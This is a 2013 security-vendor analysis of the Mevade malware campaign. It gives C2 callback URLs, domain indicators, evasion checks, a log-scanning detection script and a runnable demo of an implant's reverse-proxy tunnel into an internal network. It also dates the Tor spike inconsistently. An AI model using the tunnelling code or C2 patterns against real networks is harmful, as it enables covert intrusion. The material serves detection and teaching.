
Massive Russian Cyber-criminal Campaign Targets Business Services, Manufacturing, Government, and Transportation Industries


Tuesday, Oct 22, 2013

Websense Security Labs™ researchers have discovered a widespread cybercrime campaign using the Mevade malware that appears to originate from Russia and Ukraine and primarily targets the business services, government, manufacturing, and transportation sectors in the US, UK, Canada, and India.

In this post we analyze the malware, command and control characteristics, and attack infrastructure used in this campaign.

Executive Summary

Websense research performed on third-party feeds indicates that this campaign has infected hundreds of organizations and thousands of computers worldwide and appears to be used for a variety of purposes, including redirecting network traffic, click fraud, and search-result hijacking. More importantly, the extensible Mevade malware provides a very capable mechanism for data theft through its reverse-proxy capability. Websense customers are protected against attacks such as this at multiple stages of the attack cycle, including the attack infrastructure and the C2 protocol.

  • Websense Labs researchers have observed a massive cyber campaign that appears to have originated from Russia and Ukraine beginning around July 23, 2013, and that continues today
  • Targeted industries include: Business Services, Government, Manufacturing, and Transportation
  • Targeted countries include: USA, United Kingdom, Canada, and India (among others)
  • The malware analysis of Mevade below shows a reverse proxy capability (similar to Shylock), indicating a very flexible dropper that is well suited to rerouting network traffic, targeted theft of information, and lateral movement through target networks by creating a network-level backdoor
  • We have observed the command and control infrastructure, detailed below, hosting malware and exploits such as CVE-2012-4681, dating back to August 2012
  • The malware used in this campaign (SHA1 7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC) is associated with the large spike in Tor (The Onion Router) traffic in August 2013, which presumably provided anonymity for the cyber criminals' C&C servers
  • The heavy use of attack infrastructure (C2 servers) located in Ukraine and Russia, together with the Mevade malware, links this group to a potentially well-financed cyber-crime gang operating out of Kharkov, Ukraine, and Russia

Special thanks to Websense Labs Researchers Jack Rasgaitis and Gianluca Giuliani for their contributions to this report.

Targeted Industries

[Chart: distribution of targeted industries]

Targeted Locations vs. Command and Control Infrastructure

[Map: targeted locations vs. command and control infrastructure]

Malware Callbacks

The malware calls back with HTTP GET requests of the following form:

  • http://updsvc.net/updater/3ad219fe94fbcaba3687c5298358998d/2

A signature can be built on the URI path /updater/[32 lowercase hexadecimal characters]/[1 or 2]. Every example below fits that pattern, and because the path rather than the domain is the stable part, a signature on it also catches callbacks to C2 domains that are not yet on the list further down.

Examples:

  • /updater/28d949f1d82631dac4539d5d1ac21d6c/2
  • /updater/5eafaed947ea36a0ccec58e788a77b35/2
  • /updater/389b71b07d4d376a70952a1b1c571d68/2
  • /updater/01e8d75a7a368f854bcef52136985092/2
  • /updater/660c989f210fd7027085731478ab5922/2
  • /updater/fbd1375f6a9049ad9dbd0e0a38be4a8a/2
  • /updater/5122379f40e7431638125d6ee939827c/2
  • /updater/cd9d21a004c3a578ac0da997193315be/2
  • /updater/43028ea498e6ec76f5b69d47f0ede71e/2
  • /updater/5f3f651c20e5bfd5ddab74536ddb3b7b/2
  • /updater/bae58af607a8c88c08b9843aaec0327f/2 

Domains being used for command and control:

  • service-stat.com
  • updservice.net
  • autowinupd.net
  • autoavupd.net
  • service-update.net
  • full-statistic.com
  • service-statistic.com
  • stetsen.no-ip.org
  • autodbupd.net
  • automsupd.net
  • titanium.onedumb.com
  • statuswork.ddns.info
  • fullstatistic.com
  • autosrvupd.net
  • storestatistic.com
  • updsvc.net
  • reservestatistic.net
  • srvupd.com
  • stotsin.ignorelist.com
  • reserve-statistic.com
  • workstat.hopto.org
  • assetsstatistic.com
  • fullstats-srv.net
  • stats-srv.com
  • fullstats-srv.com
  • statssrv.com
  • reserv-stats.net
  • reserv-stats.com
  • pushstatistics.com
  • stats-upd.net
  • reservstats.com
  • push-statistics.net
  • push-stats.net
  • push-stats.com

Note that several of these (stetsen.no-ip.org, titanium.onedumb.com, statuswork.ddns.info, stotsin.ignorelist.com, workstat.hopto.org) are hostnames under free dynamic-DNS providers, so block or alert on the full hostname rather than the parent domain.
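The following Python script is an added example (not code from the original post or from Websense) that turns the two indicators above, the /updater/ URI signature and the C2 domain list, into a scan over proxy access logs. It narrows the "32 random characters" of the signature to lowercase hex, since every example in the post is a 32-character hex string (an assumption), and it matches listed domains as suffixes while leaving the dynamic-DNS hostnames as exact hosts so the provider's parent domain is never blocked. The Squid-format log lines are constructed for the demo, not real traffic.

```python
"""Detection helpers for the Mevade callback pattern described above.

Two independent indicators are checked per proxied request:
  * the Host equals one of the C2 domains from the post (or a subdomain of one);
  * the URI path matches /updater/<32 hex chars>/<1 or 2>.
A request can trip either, both, or neither; the URI check is what catches
callbacks to domains not yet on the list.
"""
import re
from urllib.parse import urlsplit

# Signature from the post, narrowed to lowercase hex because every listed
# example is a 32-character hex string (assumption made for this example).
UPDATER_URI = re.compile(r"^/updater/[0-9a-f]{32}/[12]$")

# Deduplicated C2 domain list from the post.  Dynamic-DNS entries are kept as
# full hostnames on purpose: matching the parent (e.g. no-ip.org) would block
# unrelated users of the same provider.
C2_DOMAINS = frozenset({
    "service-stat.com", "updservice.net", "autowinupd.net", "autoavupd.net",
    "service-update.net", "full-statistic.com", "service-statistic.com",
    "stetsen.no-ip.org", "autodbupd.net", "automsupd.net", "titanium.onedumb.com",
    "statuswork.ddns.info", "fullstatistic.com", "autosrvupd.net",
    "storestatistic.com", "updsvc.net", "reservestatistic.net", "srvupd.com",
    "stotsin.ignorelist.com", "reserve-statistic.com", "workstat.hopto.org",
    "assetsstatistic.com", "fullstats-srv.net", "stats-srv.com",
    "fullstats-srv.com", "statssrv.com", "reserv-stats.net", "reserv-stats.com",
    "pushstatistics.com", "stats-upd.net", "reservstats.com",
    "push-statistics.net", "push-stats.net", "push-stats.com",
})


def host_matches(host, domains=C2_DOMAINS):
    """True if host equals a listed domain or is a subdomain of one."""
    labels = host.lower().rstrip(".").split(".")
    # Try "a.b.c.tld", "b.c.tld", "c.tld"; never the bare TLD.
    return any(".".join(labels[i:]) in domains for i in range(len(labels) - 1))


def classify_request(method, url):
    """Return the indicators a single request trips, in a fixed order."""
    reasons = []
    parts = urlsplit(url)
    if host_matches(parts.hostname or ""):
        reasons.append("c2-domain")
    if method == "GET" and UPDATER_URI.match(parts.path):
        reasons.append("updater-uri")
    return reasons


def scan_log(lines):
    """Scan Squid native-format access log lines; return one dict per hit.

    Field layout: time elapsed client action/code bytes method URL ...
    """
    hits = []
    for line in lines:
        fields = line.split()
        if len(fields) < 7:
            continue  # blank or truncated line
        client, method, url = fields[2], fields[5], fields[6]
        reasons = classify_request(method, url)
        if reasons:
            parts = urlsplit(url)
            hits.append({"client": client, "host": parts.hostname,
                         "path": parts.path, "reasons": reasons})
    return hits


# Constructed sample log (not real traffic).  Line 1 trips both indicators,
# line 3 is the hosting URL for v4_sl.exe (domain only), line 4 has the wrong
# trailing digit, and line 5 shows the URI rule firing on an unlisted host.
SAMPLE_LOG = """\
1382443201.123    45 10.0.0.15 TCP_MISS/200 412 GET http://updsvc.net/updater/3ad219fe94fbcaba3687c5298358998d/2 - DIRECT/203.0.113.10 text/html
1382443210.456    12 10.0.0.22 TCP_MISS/200 1024 GET http://www.example.com/updater/index.html - DIRECT/198.51.100.5 text/html
1382443222.789   300 10.0.0.15 TCP_MISS/200 369152 GET http://service-stat.com/attachments/v4_sl.exe - DIRECT/203.0.113.11 application/octet-stream
1382443230.000    20 10.0.0.31 TCP_MISS/200 200 GET http://cdn.example.net/updater/0123456789abcdef0123456789abcdef/7 - DIRECT/198.51.100.9 text/html
1382443240.111    33 10.0.0.40 TCP_MISS/200 512 GET http://unlisted.example/updater/fbd1375f6a9049ad9dbd0e0a38be4a8a/1 - DIRECT/198.51.100.12 text/html
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(hit["client"], hit["host"], hit["path"], ",".join(hit["reasons"]))
```

Running the script against the sample prints three hits: the first trips both indicators, the download of v4_sl.exe trips only the domain list, and the last line trips only the URI rule, which is the case a domain blocklist alone would miss.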

Interestingly, most of the domains above are registered through the same WHOIS privacy service: the registrant contact is gmvjcxkxhs@whoisservices.cn, listed as "Whois Privacy Protection Service | Whois Agent". This indicates that a single privacy service, not necessarily a single registrant, was used for these domains. A quick search of our domain registration database shows that over 7,000 domains have been registered through this service, so the contact address on its own is a weak pivot and should be combined with the other indicators in this post.

The majority of command and control IP addresses can be attributed to the following ASN:

  • AS44050
  • Country: RU
  • Registration date: 2007-11-09
  • Registry: RIPE NCC (ripencc)
  • Owner: PIN-AS Petersburg Internet Network LLC

Malware Analysis

  • Malware SHA1: 7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC, size: 369,152 bytes
  • Historically seen hosted at: hxxp://service-stat.com/attachments/v4_sl.exe

Microsoft first detected this malware as Mevade.A on July 2, 2013.

Static Analysis of Malware (SHA1 7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC)

As you can see below, the malware uses WQL (the WMI Query Language, a SQL-like language for querying Windows Management Instrumentation). The snippet below queries the target system's WMI repository to learn its security settings.

[Screenshot: WQL query for security settings]

Here is the direct WQL query to Windows Management Instrumentation to enumerate installed antivirus products.

[Screenshot: WQL query for installed antivirus products]

The malware authors were kind enough to leave us a list of AV engines that they were attempting to detect.

[Screenshot: list of AV engine names checked by the malware]

Interestingly, the malware attempts to detect Sandboxie, a tool commonly used by researchers to analyze malware. Below is the check executed by the malware for the presence of Sandboxie DLLs.

[Screenshot: check for Sandboxie DLLs]

Below, we see a direct check executed by the malware to search for Oracle/Sun VirtualBox services.

[Screenshot: check for VirtualBox services]

With the AV and sandbox checks complete, the loader installs the malware service.

The malware contains a “Resources” section that is used by the code as shown below.

[Screenshot: references to the Resources section]

This confirms our suspicion that the software we have analyzed so far is a loader program to install the malware service.

[Screenshot: loader code reading the Resources section]

The obfuscated code below is used to confirm that the security checks above executed correctly.

[Screenshot: obfuscated validation code]

Once the security checks have been validated and the resources section properly decoded, the loader attempts to install the malware as a service. Below is the sequence of functions offered by the installer.

[Screenshot: sequence of installer functions]

Interestingly, the buffer below contains references to the "3proxy" open source proxy software that we have previously seen associated with the Shylock/Caphaw malware.

[Screenshot: buffer containing 3proxy references]

3proxy is a tiny proxy server that can be installed on Windows-based systems (hxxp://www.3proxy.ru/). More information about 3proxy is shown below.

[Screenshot: 3proxy information]

Why Embed 3proxy in Malware?

A lightweight proxy such as 3proxy gives advanced malware the ability to tunnel attacker traffic through the infected host and directly onto the target network. In these cases the proxy is configured as a reverse proxy: the infected host initiates the connection outbound to the attacker's infrastructure, which works from behind NAT (Network Address Translation) and egress filtering where an inbound connection would not, and that connection then serves as a backdoor directly into the target network (in this case, using SSH over port 443). The use of reverse proxies indicates that the cyber-criminals plan to manually scan the network and move laterally towards more critical applications and information (such as databases, critical systems, source code, and document repositories) than exist on the originally compromised machine.
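To make the reverse-connect pattern concrete, here is an added Python illustration; it is not 3proxy's code or anything recovered from the Mevade sample. Three roles run on loopback: an "internal service" reachable only from inside, an "implant" that dials outbound to the operator and then bridges that connection to whatever internal target the operator names, and the "operator" who sends a request through the tunnel. The one-line `host:port` target header, the loopback addresses and the payload are constructed for the demo; the real tooling described in the post wraps the same idea in SSH on port 443 rather than plain TCP.

```python
"""Why a reverse proxy inside malware defeats NAT: the infected host dials OUT
to the operator, so no inbound firewall rule is needed, and the operator then
reaches internal services through that single outbound connection.

Constructed demo in plain TCP with a one-line 'host:port' target header.
Everything runs on 127.0.0.1 in threads.
"""
import socket
import threading


def _pump(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def internal_service(listener):
    """Stand-in for a service reachable only from inside the network.
    Reads one request to EOF and echoes it back with a marker prefix."""
    conn, _ = listener.accept()
    with conn:
        request = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            request += chunk
        conn.sendall(b"INTERNAL:" + request)


def implant(operator_addr):
    """Infected host.  Connects outbound to the operator, reads a 'host:port'
    line naming an internal target, opens it and bridges the two sockets."""
    upstream = socket.create_connection(operator_addr)
    header = b""
    while b"\n" not in header:
        chunk = upstream.recv(256)
        if not chunk:
            upstream.close()
            return
        header += chunk
    target_line, early_data = header.split(b"\n", 1)
    host, port = target_line.decode().rsplit(":", 1)
    target = socket.create_connection((host, int(port)))
    if early_data:  # payload that arrived in the same segment as the header
        target.sendall(early_data)
    threading.Thread(target=_pump, args=(upstream, target), daemon=True).start()
    _pump(target, upstream)
    target.close()
    upstream.close()


def operator(listener, internal_target, payload):
    """Attacker side: accept the implant's connect-back, name the internal
    target, send one request through the tunnel and collect the reply."""
    conn, _ = listener.accept()
    with conn:
        header = f"{internal_target[0]}:{internal_target[1]}\n".encode()
        conn.sendall(header + payload)
        conn.shutdown(socket.SHUT_WR)  # done sending; keep reading the reply
        reply = b""
        while True:
            chunk = conn.recv(4096)
            if not chunk:
                break
            reply += chunk
    return reply


def run_demo(payload=b"SELECT * FROM secrets"):
    """Wire the three roles together on loopback and return what the operator
    received from the internal service through the implant."""
    internal_listener = socket.socket()
    internal_listener.bind(("127.0.0.1", 0))
    internal_listener.listen(1)
    operator_listener = socket.socket()
    operator_listener.bind(("127.0.0.1", 0))
    operator_listener.listen(1)

    threading.Thread(target=internal_service, args=(internal_listener,), daemon=True).start()
    threading.Thread(target=implant, args=(operator_listener.getsockname(),), daemon=True).start()
    reply = operator(operator_listener, internal_listener.getsockname(), payload)

    internal_listener.close()
    operator_listener.close()
    return reply


if __name__ == "__main__":
    print(run_demo())
```

The point for defenders is in `implant`: the only packet the firewall sees from the victim is an outbound connection that looks like any other client session, yet the operator ends up with a full TCP path to a service the perimeter never exposed. Long-lived outbound sessions from workstations to a small set of external hosts, especially on 443 without TLS or with odd certificates, are the network-side symptom to hunt for.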

Details on Shylock's use of 3proxy:

  • BAE Systems Detica, "Pray Before You Buy With Shylock": http://baesystemsdetica.blogspot.co.uk/2013/03/pray-before-you-buy-with-shylock.html

Historical Similarities

IP addresses associated with the Command and Control domains above have been associated with hosting the Java 0-day CVE-2012-4681 in August, 2012.

The malware sample analyzed above (SHA1 7C5091177EA375EB3D1A4C4A2BBD5EB07A4CC5CC) is also associated with the recent spike in Tor (The Onion Router) traffic observed in September 2013.
